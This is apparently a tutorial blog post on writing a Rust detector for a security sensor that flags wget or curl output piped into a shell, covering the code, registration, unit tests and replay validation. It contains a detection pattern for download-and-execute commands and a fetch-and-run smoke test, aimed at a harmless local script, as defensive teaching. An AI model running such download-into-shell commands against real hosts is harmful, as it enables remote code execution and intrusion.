Tutorial

Your First Inner Warden Detector in 50 Lines

April 24, 2026·9 min read

Pick something small and obvious

The fastest way to learn the sensor is to write a detector that fires on something you can reproduce in a shell. We will catch the classic wget | sh pattern: a process pipes a remote download straight into a shell. It is loud, common in real intrusions, and easy to trigger from your own keyboard.

The full detector fits in about 50 lines of Rust. By the end you will know where it lives, how to register it, how to test it, and how to validate it against the replay corpus.

Where detectors live

Sensor detectors sit under crates/sensor/src/detectors/. Each detector is a module that implements the same trait, consumes events from the collectors, and emits findings into the JSONL stream the agent reads.

The trait is intentionally small. You get an event reference, you decide whether the event is interesting, and if it is you return a Finding with a stable id, a severity, and a small bag of fields the agent can read.
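To make that description concrete, here is a minimal sketch of what the trait and its supporting types might look like. The shapes are inferred from how this tutorial uses them. The Low and Medium severities, the default body of on_process, and the Noop detector are assumptions for illustration, and the real definitions in the sensor crate may carry more fields and methods.

```rust
// Assumed shapes, reconstructed from how the tutorial uses these types.
// The real definitions in crates/sensor may differ.

#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Severity {
    Low,    // assumed variant
    Medium, // assumed variant
    High,   // used by the detector in this tutorial
}

/// A process event as handed over by a collector.
#[derive(Debug, Clone, Default)]
pub struct ProcessEvent {
    pub pid: u32,
    pub comm: String,
    pub cmdline: Option<String>,
}

/// What a detector returns when an event is interesting.
#[derive(Debug, Clone)]
pub struct Finding {
    pub detector: &'static str,
    pub severity: Severity,
    pub pid: u32,
    pub comm: String,
    pub fields: Vec<(String, String)>,
}

pub trait Detector {
    /// Stable identifier that ends up in the findings stream.
    fn id(&self) -> &'static str;

    /// Inspect one process event. The default body (an assumption) ignores it.
    fn on_process(&self, _ev: &ProcessEvent) -> Option<Finding> {
        None
    }
}

/// Hypothetical detector that never fires, showing the smallest possible impl.
pub struct Noop;

impl Detector for Noop {
    fn id(&self) -> &'static str {
        "example.noop"
    }
}
```

Returning Option<Finding> keeps the "not interesting" path free: a detector that does not care about an event returns None and allocates nothing for the result.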

The detector

Create crates/sensor/src/detectors/wget_pipe_sh.rs with this content:

use crate::detectors::{Detector, Finding, Severity};
use crate::events::ProcessEvent;

pub struct WgetPipeSh;

impl Detector for WgetPipeSh {
    fn id(&self) -> &'static str {
        "exec.wget_pipe_sh"
    }

    fn on_process(&self, ev: &ProcessEvent) -> Option<Finding> {
        let cmd = ev.cmdline.as_deref()?;
        let lower = cmd.to_ascii_lowercase();
        let downloader = lower.contains("wget ")
            || lower.contains("curl ");
        // Accept the pipe with or without a space before the shell name.
        let pipe_to_shell = lower.contains("| sh")
            || lower.contains("|sh")
            || lower.contains("| bash")
            || lower.contains("|bash");

        if downloader && pipe_to_shell {
            return Some(Finding {
                detector: self.id(),
                severity: Severity::High,
                pid: ev.pid,
                comm: ev.comm.clone(),
                fields: vec![
                    ("cmdline".into(), cmd.into()),
                    ("technique".into(), "T1059.004".into()),
                ],
            });
        }
        None
    }
}

Two checks, one allocation, no IO. That is the shape every good detector should aim for. The kernel side already paid for the expensive part by giving us the cmdline.
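One limitation of plain substring checks is worth seeing early: "| sh" is also a prefix of "| sha256sum", so a harmless checksum pipeline would fire. The sketch below is one possible stricter variant, not the sensor's own logic. The function names (downloads_into_shell, basename) and the two name lists are hypothetical. It splits the command line on the pipe character and compares whole program names instead of substrings.

```rust
// Hypothetical lists; extend them to match your environment.
const DOWNLOADERS: &[&str] = &["wget", "curl"];
const SHELLS: &[&str] = &["sh", "bash", "dash", "zsh"];

/// Strip any directory prefix: "/usr/bin/curl" becomes "curl".
fn basename(word: &str) -> &str {
    word.rsplit('/').next().unwrap_or(word)
}

/// True when some pipeline stage mentions a downloader and the stage
/// immediately after it starts with a shell.
pub fn downloads_into_shell(cmdline: &str) -> bool {
    let stages: Vec<&str> = cmdline.split('|').collect();
    stages.windows(2).any(|pair| {
        // Left stage: any word whose basename is a known downloader.
        let has_downloader = pair[0]
            .split_whitespace()
            .any(|w| DOWNLOADERS.contains(&basename(w)));
        // Right stage: the first word must be a shell, compared as a whole name.
        let into_shell = pair[1]
            .split_whitespace()
            .next()
            .map_or(false, |w| SHELLS.contains(&basename(w)));
        has_downloader && into_shell
    })
}
```

This is still a heuristic. It knows nothing about shell quoting, and a URL whose last path segment happens to be wget or curl would count as a downloader, so treat it as a starting point only.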

Register it

Open crates/sensor/src/detectors/mod.rs, add the module declaration, and push an instance into the registry that the runtime walks for every event:

mod wget_pipe_sh;
pub use wget_pipe_sh::WgetPipeSh;

pub fn builtin_detectors() -> Vec<Box<dyn Detector + Send + Sync>> {
    vec![
        // ... existing detectors ...
        Box::new(WgetPipeSh),
    ]
}

That is the entire wiring. No config file, no plugin loader, no dynamic dispatch beyond the trait object. The detector ships with the binary.
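For intuition about what "the runtime walks the registry for every event" could mean, here is a minimal sketch. The dispatch function and the AlwaysFires detector are hypothetical, and the types are cut-down stand-ins so the block compiles on its own. The real runtime loop is not shown in this post and may look different.

```rust
// Cut-down stand-ins for the sensor types (assumed shapes).
#[derive(Default)]
pub struct ProcessEvent {
    pub pid: u32,
    pub cmdline: Option<String>,
}

pub struct Finding {
    pub detector: &'static str,
    pub pid: u32,
}

pub trait Detector {
    fn id(&self) -> &'static str;
    fn on_process(&self, ev: &ProcessEvent) -> Option<Finding>;
}

/// Hypothetical dispatch step: offer one event to every registered
/// detector and keep whatever findings come back.
pub fn dispatch(
    detectors: &[Box<dyn Detector + Send + Sync>],
    ev: &ProcessEvent,
) -> Vec<Finding> {
    detectors.iter().filter_map(|d| d.on_process(ev)).collect()
}

/// Toy detector used only to exercise the loop.
pub struct AlwaysFires;

impl Detector for AlwaysFires {
    fn id(&self) -> &'static str {
        "example.always"
    }

    fn on_process(&self, ev: &ProcessEvent) -> Option<Finding> {
        Some(Finding { detector: self.id(), pid: ev.pid })
    }
}
```

Because each detector only borrows the event and takes &self, the same registry can be shared across threads, which is what the Send + Sync bounds on the boxed trait object allow.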

Write a unit test

Add a #[cfg(test)] block at the bottom of the file. Hand-build a ProcessEvent, feed it through, and assert. The whole point of keeping detectors pure functions of an event is that tests stay trivial.

#[cfg(test)]
mod tests {
    use super::*;

    fn ev(cmd: &str) -> ProcessEvent {
        ProcessEvent {
            pid: 1234,
            comm: "sh".into(),
            cmdline: Some(cmd.into()),
            ..Default::default()
        }
    }

    #[test]
    fn fires_on_wget_pipe_sh() {
        let f = WgetPipeSh.on_process(&ev("wget -qO- http://x | sh"));
        assert!(f.is_some());
    }

    #[test]
    fn ignores_plain_wget() {
        let f = WgetPipeSh.on_process(&ev("wget http://x -O /tmp/y"));
        assert!(f.is_none());
    }
}

Run cargo test -p sensor wget_pipe_sh from the repo root. Both tests should pass in a few hundred milliseconds.

Validate against the replay corpus

Unit tests prove the function is correct on synthetic input. Replay proves it survives real traces without firing on normal traffic. The repo ships a bag of recorded sessions under qa/replay/. Run them all with:

make replay-qa

The harness re-feeds each trace through the full sensor pipeline and diffs the findings against a golden file. If your new detector fires on something benign, the diff fails loudly and you know exactly which trace caused it. Add a new trace under qa/replay/wget_pipe_sh/ with a short README that says what the trace contains and what should fire.
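The golden-file comparison can be pictured as a set difference over finding lines. The sketch below is an illustration of that idea, not the harness's actual code. The diff_findings name is hypothetical, and it assumes one finding per line on both sides.

```rust
use std::collections::BTreeSet;

/// Compare golden and actual findings, one finding per line.
/// Returns (unexpected, missing): lines only in `actual`, and lines only in `golden`.
pub fn diff_findings<'a>(golden: &'a str, actual: &'a str) -> (Vec<&'a str>, Vec<&'a str>) {
    // Blank lines carry no finding, so drop them before comparing.
    let want: BTreeSet<&str> = golden.lines().filter(|l| !l.trim().is_empty()).collect();
    let got: BTreeSet<&str> = actual.lines().filter(|l| !l.trim().is_empty()).collect();

    let unexpected = got.difference(&want).copied().collect();
    let missing = want.difference(&got).copied().collect();
    (unexpected, missing)
}
```

A false positive from a new detector would show up in the first list, and a detector that stopped firing would show up in the second. Comparing as sets ignores ordering and duplicates, which may or may not match what the real harness does.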

Trigger it on a live host

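On a test box with the sensor running, the easiest smoke test is also the most embarrassing one. Run the pipeline through sh -c so that the pipe ends up inside a single process command line. Typed directly at a prompt, the shell spawns wget and sh as separate processes and neither cmdline contains the | character. The server is pointed at /tmp so that the URL path matches the file:

echo 'echo hello from a fake payload' > /tmp/p.sh
python3 -m http.server 8080 --bind 127.0.0.1 --directory /tmp &
sleep 1
sh -c 'wget -qO- http://127.0.0.1:8080/p.sh | sh'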

Watch /var/lib/innerwarden/findings.jsonl. You should see an exec.wget_pipe_sh entry within a few hundred milliseconds, with the cmdline and the MITRE technique attached. If you do not, run the agent in the foreground with RUST_LOG=debug and look for the detector being skipped.
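If you would rather check the stream from code than by eye, a small filter is enough. This is a sketch under two assumptions: the function name lines_mentioning is made up for this example, and the detector id is assumed to appear in each JSONL line as a quoted string. The exact field layout of the findings file is not documented in this post, so the sketch matches on the quoted id and does not parse JSON.

```rust
use std::io::BufRead;

/// Return every line from `reader` that contains the detector id as a
/// quoted JSON string, for example "exec.wget_pipe_sh".
pub fn lines_mentioning<R: BufRead>(reader: R, detector_id: &str) -> Vec<String> {
    let needle = format!("\"{}\"", detector_id);
    reader
        .lines()
        // Stop at the first read error and keep what was read so far.
        .map_while(Result::ok)
        .filter(|line| line.contains(&needle))
        .collect()
}
```

To use it against the live file, wrap std::fs::File::open("/var/lib/innerwarden/findings.jsonl") in a std::io::BufReader and pass "exec.wget_pipe_sh" as the id.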

What to do next

Real detectors usually go beyond a single substring match. You add an allowlist of parent processes that are permitted to run the pattern, you fold in network context (was the URL's host resolved via DNS a moment ago?), and you graduate the finding into a kill chain pattern so the agent can correlate it with later events.
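The parent allowlist is the simplest of those refinements to picture. The sketch below assumes the event exposes the parent's process name, which the ProcessEvent shown in this post does not. The ALLOWED_PARENTS entries and the parent_is_allowed helper are hypothetical.

```rust
/// Hypothetical parents that are expected to pipe downloads into a shell,
/// for example provisioning tools on a build host.
const ALLOWED_PARENTS: &[&str] = &["ansible-playbook", "packer"];

/// True when the parent process name is known and on the allowlist.
/// An unknown parent (None) is never treated as allowed.
pub fn parent_is_allowed(parent_comm: Option<&str>) -> bool {
    parent_comm.map_or(false, |p| ALLOWED_PARENTS.contains(&p))
}
```

Inside on_process, a check like this would sit before the Finding is built: if parent_is_allowed returns true, return None instead of firing. Treating a missing parent as not allowed keeps the detector on the noisy side, which is usually the safer default for a High severity finding.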

The mechanics never change. New file, register it, unit test, replay-qa, ship.
